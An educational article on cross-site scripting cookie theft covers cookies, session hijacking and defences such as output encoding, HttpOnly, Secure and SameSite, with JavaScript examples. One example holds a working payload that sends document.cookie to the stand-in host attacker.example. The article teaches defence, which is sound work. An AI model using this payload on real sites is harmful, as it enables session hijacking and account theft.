Cross-Site Scripting: Cookie Stealing Attack

What is a Cookie?

A cookie is a small piece of data that a website's server asks your browser to store, and that the browser then sends back with every later request to that site. It is how a site keeps track of you across pages. For example, an online shop remembers what you have put in your cart; when you reach step 5 or 6 of checkout and add a payment option, the site still knows everything you entered earlier. That works because the first time you visit, the server sets a cookie containing a unique identifier for your session, and each subsequent request carries that identifier back to the server.

Cookies are also used to collect analytical information about the user: preferences, most visited pages, time spent on a particular page, and so on. The site reads this information back from the cookie on each request, and if you have visited before, the unique identifier in the cookie lets the server recognise you.

Cookies can also be used to track what you do online. A common example is advertising: if you search for a particular item, sites that share the same advertising network can show you ads for that item, because the tracking cookie ties your visits together.

Why do we require Cookies?

HTTP is stateless. When you make an HTTP request to a website, the server responds with HTML and perhaps JavaScript, and that is the end of that transaction. Your next request, whether you click a link or search for something else, is a completely separate transaction, even if it reuses the same TCP connection; nothing in the protocol itself links it to the previous one. Cookies supply that missing state: the server sets one with a Set-Cookie response header, the browser stores it, and the browser attaches it to every later request to that site in the Cookie header. That is what turns a series of unrelated requests into a session, and it is also what lets a site accumulate analytical information about a user across visits.

What is Cookie Stealing?

If an attacker obtains your session cookie for a particular website, they can present it to that site and be treated as you, without ever knowing your password. That gives them access to whatever sensitive data your account holds. There are two common ways to get at the cookie. The first is on the network: cookies travel in plain HTTP headers between your browser and the server, passing through every proxy and network hop in between, so on an unencrypted (plain HTTP) connection anyone positioned on that path can read them. The second is cross-site scripting (XSS), which needs no network position at all: attacker-controlled script running in the page inside your browser can read the cookies the browser has stored for that site and send them wherever it likes.

If cookies travel unencrypted, an attacker who intercepts them can replay them and impersonate you to that website. A second problem is that some sites store sensitive information about you directly in cookies, for example bank details, email addresses or postal addresses, so a stolen cookie can leak that data outright, not just your session.

How does an attacker steal cookies using a Cross-site Scripting attack and hijack the session?

Cross-site scripting is a code injection attack. If a web application places user-controlled input into its pages without encoding it, an attacker can inject JavaScript into that spot, and the victim's browser will run it as if it were the site's own code. For cookie theft, the attacker writes the injected script so that it reads the victim's cookies (through document.cookie) and sends them to a server the attacker controls, typically by loading an image or making a request whose URL contains the cookie value.

In the reflected variant, all the attacker has to do is send the victim a link. Suppose a user is logged in to a website, so their browser holds a valid session cookie for it. The attacker sends them a link to that same website with the malicious script embedded in a parameter the site echoes back unencoded; when the victim opens it, the script runs in the background, in the context of the site, and ships the cookie to the attacker. In the stored variant the payload is saved by the site (in a comment or profile field, say) and runs for every user who views that page, no link required. Either way, the attacker then adds the stolen cookie to their own requests and the site treats them as the victim, exposing whatever the account holds: bank details, credit card details, addresses and so on.
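The scenario above, as an added example that is not part of the original article: a page that interpolates a search term into HTML without encoding, next to the hardened version, and the kind of payload an attacker would inject. It is written as pure functions so it runs in Node without a server; the function names, the search page and the host attacker.example are all hypothetical, and the cookie string stands in for what document.cookie would return in the victim's browser.

```javascript
// Added example, not code from the original article. All names are hypothetical.

// Vulnerable: the search term goes straight into the HTML, so a term that
// contains markup becomes markup in the victim's browser.
function renderSearchPageVulnerable(term) {
  return `<h1>Results for: ${term}</h1>`;
}

// Hardened: encode the five HTML-significant characters before interpolating.
function htmlEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderSearchPageSafe(term) {
  return `<h1>Results for: ${htmlEncode(term)}</h1>`;
}

// The injected script. When it runs in the victim's browser it loads an
// image whose URL carries document.cookie, so the browser itself delivers
// the cookies to the attacker's server as a GET request.
const exfilPayload =
  '<script>new Image().src="https://attacker.example/c?d="+encodeURIComponent(document.cookie)</script>';

// What that payload computes once it runs: the URL the victim's browser will
// request. cookieString stands in for document.cookie.
function exfilUrl(cookieString) {
  return "https://attacker.example/c?d=" + encodeURIComponent(cookieString);
}

// Does the rendered HTML contain an executable <script> element?
// (Encoded output contains "&lt;script" instead, which the browser shows as text.)
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed sample: the cookies a logged-in victim might hold.
const victimCookies = "sessionid=abc123; prefs=dark";

console.log(renderSearchPageVulnerable(exfilPayload)); // script tag lands in the page
console.log(renderSearchPageSafe(exfilPayload));       // inert, encoded text
console.log(exfilUrl(victimCookies));                  // what the attacker's server receives
```

Once the attacker's server has logged that request, replaying the session is a matter of sending the captured value in a Cookie request header; nothing about the original password is needed. The only difference between the two render functions is the encoding step, which is why output encoding at the point of interpolation is the primary fix for XSS.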

How to defend against Cookie Stealing?

Serve the site over HTTPS (that is, obtain a TLS certificate and redirect plain HTTP to HTTPS). This encrypts all traffic in transit, so an attacker who intercepts your network traffic sees ciphertext rather than a usable cookie. On its own, though, HTTPS does nothing against the XSS route described above, because there the cookie is read inside the victim's browser, after decryption. Two further measures close that gap. First, set session cookies with the HttpOnly attribute, which makes them invisible to document.cookie, and with the Secure attribute, so the browser never sends them over plain HTTP; adding SameSite also stops the browser attaching them to cross-site requests. Second, and most importantly, fix the XSS itself by encoding user input wherever it is placed into HTML, since a script that cannot read the cookie can still perform actions in the victim's session while the page is open.
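The cookie-attribute side of the defence, as an added example that is not from the original article: a helper that emits a session cookie with the protective attributes, a small Set-Cookie parser, an audit that reports which attributes a given header is missing, and a simulation of what document.cookie would expose to injected script. Function names and the sample headers are constructed for illustration; the parser handles the attribute syntax of a single Set-Cookie header and is not a full cookie implementation.

```javascript
// Added example, not code from the original article. Names are hypothetical.

// Emit a Set-Cookie header value for a session cookie with the attributes that
// blunt cookie theft: HttpOnly (hidden from script), Secure (HTTPS only) and
// SameSite (not attached to cross-site requests).
function buildSessionCookie(name, value, opts = {}) {
  const { maxAge = 3600, sameSite = "Lax" } = opts;
  return [
    `${name}=${encodeURIComponent(value)}`,
    "Path=/",
    `Max-Age=${maxAge}`,
    "HttpOnly",
    "Secure",
    `SameSite=${sameSite}`,
  ].join("; ");
}

// Parse one Set-Cookie header value into name, value and a lower-cased
// attribute map (flag attributes map to true, valued ones to their string).
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const attributes = {};
  for (const a of attrs) {
    if (!a) continue;
    const i = a.indexOf("=");
    const key = (i === -1 ? a : a.slice(0, i)).trim().toLowerCase();
    attributes[key] = i === -1 ? true : a.slice(i + 1).trim();
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attributes };
}

// Audit a Set-Cookie header the way a tester would: list each missing
// protection and the theft route it leaves open.
function auditSetCookie(header) {
  const { attributes } = parseSetCookie(header);
  const findings = [];
  if (!attributes.httponly) {
    findings.push("missing HttpOnly: readable via document.cookie, so XSS can exfiltrate it");
  }
  if (!attributes.secure) {
    findings.push("missing Secure: sent over plain HTTP, so it can be sniffed in transit");
  }
  const sameSite = String(attributes.samesite || "").toLowerCase();
  if (!sameSite || sameSite === "none") {
    findings.push("SameSite missing or None: attached to cross-site requests");
  }
  return findings;
}

// Simulate the string document.cookie would return for a set of cookies:
// browsers omit HttpOnly cookies from it, so injected script never sees them.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !c.attributes.httponly)
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// Constructed sample headers: a weak session cookie and a hardened one.
const weakHeader = "sessionid=abc123; Path=/";
const hardenedHeader = buildSessionCookie("sessionid", "abc123");

console.log(auditSetCookie(weakHeader));     // three findings
console.log(auditSetCookie(hardenedHeader)); // []
// With HttpOnly set, an XSS payload reading document.cookie gets only "prefs=dark".
console.log(scriptVisibleCookies([hardenedHeader, "prefs=dark; Path=/"]));
```

Run the audit against the Set-Cookie headers in a real response (from browser developer tools or a proxy) to see which of the three attributes a site actually sets. Note that HttpOnly hides the cookie from script but does not stop script that is already running in the page from making requests with it; that is why output encoding remains the primary fix.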
